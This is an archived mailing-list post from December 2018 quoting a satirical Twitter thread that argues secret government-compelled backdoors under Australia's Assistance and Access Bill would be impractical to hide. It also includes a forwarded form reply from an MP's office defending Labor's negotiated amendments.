[LINK] [Fwd: RE: Please stop the Assistance and Access Bill]

Wed Dec 5 16:41:47 AEDT 2018

https://twitter.com/alfiedotwtf/status/1070047303275175936

Alfie John

‏ @alfiedotwtf

One of the ways #AABill gets access to systems is by commandeering employees of companies to write backdoors. But they’re not even allowed to tell their employer, or face jail time.

I went through the mechanics of this, and realised how out of touch Canberra is...

12:08 PM - 4 Dec 2018

   Alfie John

   @alfiedotwtf

   9h9 hours ago

Let’s say they coerce a backend end dev to write a data tap. A few lines of code here and there, write to a file or connect straight to http://@ASDGovAu/api/vacuum/

Now what? Most devs don’t have access to production! Hilarity ensues...

Alfie John

‏ @alfiedotwtf

9h9 hours ago

The dev is now going to somehow commit this to the repo in order to get it through the pipelines.

First thing is CI/CD will reject the commit because there’s no JIRA ticket for the change.

Ok, let’s slip it under another ticket. Nope! Test harness no longer passes!

Alfie John

‏ @alfiedotwtf

9h9 hours ago

Damn... going to have to write some tests for this tap. Done. Git push.

NOW WAIT FOR THE MERGE REQUEST!

Alfie John

‏ @alfiedotwtf

9h9 hours ago

At least one other person is going to see the code change, and alert your boss that you’re a Russian spy and stealing data.

Now remember, you’re not allowed to tell anyone or face jail time.

So the only way to hide this is if an admin is commandeered as well...

Alfie John

‏ @alfiedotwtf

9h9 hours ago

Nope.

Devops have IDS, so all changes to the system will be seen by everyone in devops. Busted.

So the ONLY way to get a tap in is to put a gun against the head of EVERYONE in devops.

Wait...

Alfie John

‏ @alfiedotwtf

9h9 hours ago

What happens when another dev does a git fetch? They rebase their own code to submit their own changes, do a diff, and now in front of their eyes is the exploit. Busted.

So the ONLY way to get a tap in is to put a gun against the head of EVERYONE in dev.

LOL!

Alfie John

‏ @alfiedotwtf

9h9 hours ago

Let’s picture a small company... Ever tried to keep a secret between 5 devops and 10 devs? How about a bigger company - 30 devs and 10 devops!

Alfie John

‏ @alfiedotwtf

9h9 hours ago

So the only way I see fighting this is by devs and devops quitting their post if ever asked to work on any Notices.

I wonder if there’s anything in the Unfair Dismissal clauses to cover this since your job is no longer tenable 🤔

Alfie John

‏ @alfiedotwtf

8h8 hours ago

Or let’s say we have a Tor-enables canary system for devs and devops, to leak that a company or themselves have been commandeered... untraceable.

When the canary dies in the coal mine (because Australia loves its coal), IC are going to want to trace the source...

Alfie John

‏ @alfiedotwtf

8h8 hours ago

but they can’t because of how this canary system works. And leaks still happen. What is an #AABill government to do?

The only solution here is to hack the devs and devops they want to commandeer before they’re coopted.

So you’re now being spied on, simple because of your job :(

Alfie John

‏ @alfiedotwtf

8h8 hours ago

Now to time management. When do these taps actually get done? In today’s micromanaged Agile-Scrum-Kanban environment, every minute is tracked, and tracked to JIRA tickets.

Management are now seeing timelines slip because you’re not hitting targets...

Alfie John

‏ @alfiedotwtf

8h8 hours ago

So how are you going to explain slippage? You’re now going to have to commandeer management too!

Now sales are starting to wonder why changes aren’t shipping. They’ve made promises to clients. Easy changes are now taking ages. Devs aren’t speaking, devops are tight lipped...

Alfie John

‏ @alfiedotwtf

8h8 hours ago

and now that management are also on board, they too can’t say a word. So sales start digging. As former devs, they start looking at JIRA and commit messages. They’ve just found the implants.

So sales too are now commandeered!

This secret club is starting to get scope creep 🤦‍♂️🤦‍♂️

Alfie John

‏ @alfiedotwtf

8h8 hours ago

Sorry, what was that... you’re a vendor and your clients require as part of the tender release all source code and they build on their own machines?

Alfie John

‏ @alfiedotwtf

7h7 hours ago

So is #AABill Constitutionally sound?

The Australian Constitution protects property from seizure “on just terms”...

If computers, phones, source code, networks, etc can be seen as “property”, then I can’t believe it might actually come down to The Castle 🤣🤣

==

Cheers,

Stephen

Sent from Mail<https://go.microsoft.com/fwlink/?LinkId=550986> for Windows 10

________________________________
From: Link <link-bounces at mailman.anu.edu.au> on behalf of Karl Auer <kauer at biplane.com.au>
Sent: Wednesday, December 5, 2018 2:21:05 PM
To: Link List; Privacy
Subject: [LINK] [Fwd: RE: Please stop the Assistance and Access Bill]

What's the point? Why do they waste my time and theirs with crap like
this? It's no better than the auto-response I got to the original
email.

Regards, K.

-------- Forwarded Message --------
From: "Noveska, Radmila (M. Kelly, MP)" <Radmila.Noveska at aph.gov.au>
To: 'kauer at biplane.com.au' <kauer at biplane.com.au>
Subject: RE: Please stop the Assistance and Access Bill
Date: Wed, 5 Dec 2018 03:11:08 +0000

Dear Mr Auer

Thank you for your email to Dr Kelly regarding the Telecommunications
and Other Legislation Amendment (Assistance and Access) Bill.

Dr Kelly has acknowledged your email and has asked me to respond on his
behalf.

Labor has spent five years responsibly improving national security
legislation to make Australians safer, and we have done the same thing
this week.

The government have made important concessions on its earlier positions
on the Telecommunications and Other Legislation Amendment (Assistance
and Access) Bill.

It appears the government will agree to proposals by Labor that will
ensure there is better oversight and limitation of the powers in this
bill, and better safeguards against potential unintended consequences.
These are still subject to agreement by the Parliamentary Joint
Committee on Intelligence and Security, and further details will be
contained in its report on the bill.

The changes include limiting the application of the powers in this bill
to only serious offences, properly defining key terms in the bill, and
requiring a “double-lock” authorisation process for Technical
Capability Notices.

Importantly, the PJCIS will continue its scrutiny of the bill into
2019, allowing for outstanding concerns to be worked on and further
amendments considered in the new year if necessary.

Following the extraordinary interference with this committee by the
Minister for Home Affairs and Prime Minister, Labor welcomes the
constructive negotiations conducted with the Attorney-General over the
past two days.

Dr Kelly and Labor are very clear – this bill is far from perfect and
there are likely to be significant outstanding issues. But this
compromise will deliver security and enforcement agencies the powers
they say they need over the Christmas period, and ensure adequate
oversight and safeguards to prevent unintended consequences while
ongoing work continues – just as Labor proposed.

Labor has issued a call to the government – the trashing of bipartisan
process and politicisation of national security that has occurred over
the past month must never happen again. There is nothing more important
than keeping Australians safe – the government must remember that.

Thank you again for writing to Dr Kelly on this important issue and if
there is any federal matter Dr Kelly can assist you with, please do not
hesitate to contact our office.

Kind regards,

Radmila Noveska
Office of The Hon Dr Mike Kelly AM MP
Federal Member for Eden-Monaro
Shadow Assistant Minister for Defence Industry and Support
t: 02 6284 2442

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Karl Auer (kauer at biplane.com.au)
http://www.biplane.com.au/kauer
http://twitter.com/kauer389

GPG fingerprint: A0CD 28F0 10BE FC21 C57C 67C1 19A6 83A4 9B0B 1D75
Old fingerprint: A52E F6B9 708B 51C4 85E6 1634 0571 ADF9 3C1C 6A3A

_______________________________________________
Link mailing list
Link at mailman.anu.edu.au
http://mailman.anu.edu.au/mailman/listinfo/link